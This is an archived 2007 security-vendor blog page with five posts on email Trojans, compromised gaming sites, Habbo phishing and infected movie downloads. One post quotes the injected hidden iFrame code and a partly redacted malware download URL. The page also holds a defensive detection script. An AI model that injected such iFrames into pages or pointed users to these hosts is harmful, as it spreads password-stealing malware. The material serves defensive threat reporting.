
Archive for November 21st, 2007


Nov21
by Bixie Villavicencio (Technical Communications)

VIP? Not in a fraudster’s vocabulary. Fraudsters do not discriminate by person, date or time when releasing their attacks, and even the US Department of Justice (USDOJ) is not exempt from being victimized by fraud spammers.

A spam email message is circulating on the Web that mimics the authentic USDOJ letterhead, on which the hoax message is written. Because it bears the USDOJ logo, an unsuspecting recipient could be deceived into believing that the email is legitimate.

The message alarms the recipient by claiming that a complaint has been filed with the US Dept. of Justice against the recipient’s company, and that a copy of the complaint is attached to the mail. A recipient shocked by the email would then open the attached document.

What the recipient does not know is that the attached file is actually a Trojan downloader, detected by Trend Micro as TROJ_DLOADER.QRQ. When executed, this Trojan also drops several malicious files, including TROJ_RUNDIS.H and TROJ_AGENT.ADCU.

People have to be triple cautious about email messages. Without antivirus software and other proactive security measures (such as Web reputation or Web blocking services), only personal discretion stands between a user and malware.

This applies to everyone; there is no VIP treatment in this department.

Posted in Malware

Nov21
by Carolyn Guevarra (Technical Communications)

In the online gaming world, MMORPGs (Massively Multiplayer Online Role-playing Games) are the most popular worldwide, exceeding 15 million users in 2006 and earning billions of dollars in revenue to date. It’s a booming business, no doubt. This is why a lot of MMORPG sites offering various services to help players boost their character abilities have been mushrooming in every corner of the Web. This is also why these sites have become a favorite target of malicious users.

Such is the case for Gameige.com. This Web site offers power leveling services (such as upgrading a player’s game character, skills and level) for popular online games such as World of Warcraft (WoW), Lord of the Rings, Lineage2 and EverQuest.

[Figure: Gameige.com infection diagram]

Earlier today, Trend Micro Threat Analyst Jonell Baltazar reported that Gameige.com has been compromised to contain several malicious iFrames leading to the download of several Trojans and spyware programs.

When the said MMORPG site is accessed, it opens the following Web pages:

  • http://www.{BLOCKED}g.org/download/text/1.htm
  • http://www.{BLOCKED}g.org/download/text/2.htm
  • http://www.{BLOCKED}g.org/download/text/3.htm
  • http://www.{BLOCKED}cx.cn/wm.htm?id=823
  • http://www.{BLOCKED}anyu.net/noopxp/oo/ico.gif?1717

These Web pages house a bunch of exploit code, which in turn downloads various malware, such as the following, among other generic packers and information-stealers:

  • TSPY_ONLINEG.IRZ
  • TSPY_ONLINEG.ISZ
  • TSPY_ONLINEG.LKC
  • TROJ_UPACK.AG
  • PE_LOOKED.GEN
  • WORM_DLOADER.TCG

Note that as of this writing, the Web sites may still be active. The exploits take advantage of the Microsoft Data Access Components (MS06-014) vulnerability and the BaoFeng Storm ActiveX Controls Multiple Remote Buffer Overflow vulnerabilities in order to download these malicious programs.


Nov21
by Joey Costoya (Advanced Threats Researcher)

A page on a site dedicated to fans of the World of Warcraft MMORPG seems to be compromised (Warning: malware code still active as of this writing):

  • http://wow.gameamp.com/info/showRaces

The said page has hidden iFrames embedded in several parts:

<iframe height="1" width="0"
src="http://{BLOCKED}1%33%31%37%35/1.htm"></iframe>

The iFrame’s landing page, when deobfuscated, points to

  • http://{BLOCKED}175.com/1.htm

The iFrame code eventually results in the download of the following file:

  • http://www.{BLOCKED}175.com/88.exe

…which is a password-stealer for online games. Fortunately, Trend Micro already blocks these malicious sites with its Web reputation services.
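The injection above (and the malicious iFrames on Gameige.com described earlier) share a pattern a defender can check for: an iFrame sized 1x0 whose src hostname is percent-encoded so it is not obvious on inspection. The script below is an added example, not code from the original post; it scans a captured HTML page for hidden iFrames and decodes the host in their src. The sample HTML and the hostname example.test are constructed for the demonstration.

```python
"""Flag hidden iframes in captured HTML and reveal percent-encoded src hosts."""
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample: one injected 1x0 iframe with a percent-encoded host,
# plus a normal visible embed that must not be flagged.
SAMPLE_HTML = """<html><body><h1>Races</h1>
<iframe height="1" width="0" src="http://example%2e%74%65%73%74/1.htm"></iframe>
<iframe width="600" height="400" src="http://example.org/embed"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag as a dict."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """An iframe is treated as hidden when either dimension is 0 or 1 pixels."""
    def tiny(value):
        digits = "".join(ch for ch in value if ch.isdigit())
        return digits != "" and int(digits) <= 1
    return tiny(attrs.get("height", "")) or tiny(attrs.get("width", ""))


def suspicious_iframes(html):
    """Return (raw_src, decoded_host, was_obfuscated) for each hidden iframe."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        if not is_hidden(attrs):
            continue
        src = attrs.get("src", "")
        host = urlsplit(src).netloc          # e.g. example%2e%74%65%73%74
        decoded = unquote(host)              # percent-decoding reveals example.test
        findings.append((src, decoded, decoded != host))
    return findings


if __name__ == "__main__":
    for src, host, obfuscated in suspicious_iframes(SAMPLE_HTML):
        print(f"hidden iframe -> {host} (obfuscated={obfuscated}) from {src}")
```

Run it against a saved copy of a page rather than fetching a live site; the decoded host is what you hand to your Web reputation or blocking service.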

Online games have long been targeted by malware, mainly due to the thriving virtual economy underlying them. The daily exchange of virtual goods for real money between avid players can indeed spell profit for malware authors, and fan sites are the perfect portal for relaying these password-stealing malware.

Online players should therefore be on their guard — both inside the game and outside it. Safe-looking sites do not guarantee safety, and the malware enemy can strike anywhere… ready for the kill.


Nov21
by Justine Paredes (Technical Communications)

Stealing login information from online games and other social networking sites is old news. Because it’s so common, it doesn’t seem to be much of a big deal. However, when real money is involved and people get arrested, that’s when things get messy.

Just recently, a Dutch teenager was arrested for stealing almost $6000 worth of virtual furniture from users of the Habbo Hotel, a teenage chat room and gaming Web site.

The concept of Habbo Hotel is that virtual furniture is purchased and/or traded by the community members in order to furnish their respective “hotel rooms”. Purchasing and trading are made possible through “credits”, which are paid with real money.

According to the site’s owner, fake Habbo Web sites were created to draw players into visiting them. The visitors’ user names and passwords were then collected from these spoofed sites so that the hackers could access the real user accounts on the real Habbo Web site. Virtual furniture was then stolen from the victims’ accounts, turning the theft into cold, hard cash.

This kind of phishing attack serves as a caution not only to Habbo users, but to all Internet users who spend real money on the Net, especially on virtual exchanges. Shelling out money to people we can’t see is never safe. The moolah is surely better spent on furniture that we can actually sit or lie on. Nothing beats the real thing.

Posted in News, Phishing

Nov21
by Jercyl Lerin (Technical Communications)

Caution, indeed, seems to be the operative word when it comes to “Lust, Caution,” a sexually graphic espionage movie set in World War II Shanghai. It has been receiving good reviews from around the world, winning the top award at the recent Venice Film Festival and reaping millions of dollars, despite the fact that its China release was cut short by director Ang Lee (“Brokeback Mountain”) himself in keeping with Chinese censorship rules. News of Chinese moviegoers suing their film censor over the edited version also hit the media.

However, the “Lust, Caution” buzz does not stop there. Recently, a Chinese antivirus company reported that hackers embedded viruses into a significant number of sites that offer free downloads of the movie.

The censorship move may have just further fueled the attraction of downloading free copies from infected Web sites, especially those in China. With a host of Web sites offering free movie downloads, computer users are warned to be cautious in downloading as they might unwittingly compromise their machines. An engineer from the Rising International Software Co. Ltd. in China reportedly encountered the virus last week. He was left with a blank screen and his instant messaging password was stolen.

Malicious users are indeed striking while the iron is hot. As “Lust, Caution” blazes a steamy trail to success, these embedded viruses may continue to make the rounds not only in China but in other countries as well. Users must try to resist the combined attraction of sex, espionage and Ang Lee, especially because viruses are in the mix.

Posted in Malware


© Copyright 2008 Trend Micro Inc. All rights reserved.